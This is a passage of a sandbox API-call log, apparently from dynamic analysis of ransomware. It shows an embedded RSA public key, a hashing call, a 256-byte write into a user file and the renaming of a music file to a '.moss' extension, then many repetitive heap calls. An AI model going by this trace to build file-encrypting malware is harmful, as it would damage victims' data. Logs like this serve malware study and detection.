KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.552] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0171.552] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.552] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.552] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0171.553] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.553] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.553] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.553] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0171.553] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.553] GetLastError () returned 0x0 [0171.554] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.554] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0171.554] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.554] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.554] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0171.554] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.554] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.554] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0171.555] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xc632, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.555] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.555] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\BVm 0I0y19-I.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d99ykjdl-0lajd\\bvm 0i0y19-i.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\BVm 0I0y19-I.wav.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d99ykjdl-0lajd\\bvm 0i0y19-i.wav.moss")) returned 1 [0171.557] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0171.557] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0171.557] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2840 | out: hHeap=0xcd0000) returned 1 [0171.557] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0171.557] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2840 [0171.557] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0171.557] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.557] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.557] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.557] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.557] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.557] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.557] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.557] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.557] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.557] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.557] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.558] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.558] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.558] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.558] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.558] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.558] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.558] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.558] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.558] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.558] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.558] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.558] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.558] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.558] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.558] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.558] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0171.558] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.558] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.558] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.558] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.558] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.558] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.558] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.558] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.558] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.558] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.558] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.558] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.558] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.558] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.558] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.558] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.559] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.559] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.559] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.559] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.559] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.559] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.559] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.559] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.559] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.559] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.559] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.559] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.559] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.559] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.559] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.559] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.559] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.559] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.559] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.559] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.559] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.559] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.559] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.559] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.559] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.559] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.559] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.559] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.559] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.559] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.559] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.560] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.560] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.560] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.560] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.560] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.560] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.560] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.560] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.560] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.560] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.560] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.560] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.560] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.560] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.560] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.560] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.560] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.560] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.560] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0171.560] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.560] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.560] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.560] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.560] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.560] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.560] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.560] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.560] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.560] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0171.560] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.560] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.560] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.560] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.561] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.561] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.561] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.561] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.561] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.561] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.561] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.561] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.561] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.561] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.561] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.561] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.561] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.561] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.561] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.561] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.561] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.561] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0171.561] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.561] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.561] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.561] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.561] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.561] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.561] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.561] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.562] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.562] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.562] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.562] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.562] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.562] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.562] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.562] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.562] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.562] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.562] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.562] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.562] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.562] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.562] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.562] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.562] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.562] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.562] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.562] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.562] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.562] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.562] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.562] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.562] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.563] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.563] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.563] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.563] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.563] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.563] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.563] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.563] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.563] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0171.563] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.563] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.563] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.563] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.563] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.563] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.563] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.563] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.563] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.563] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.563] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.563] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.563] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.563] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.563] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.563] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.563] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.564] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.564] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, 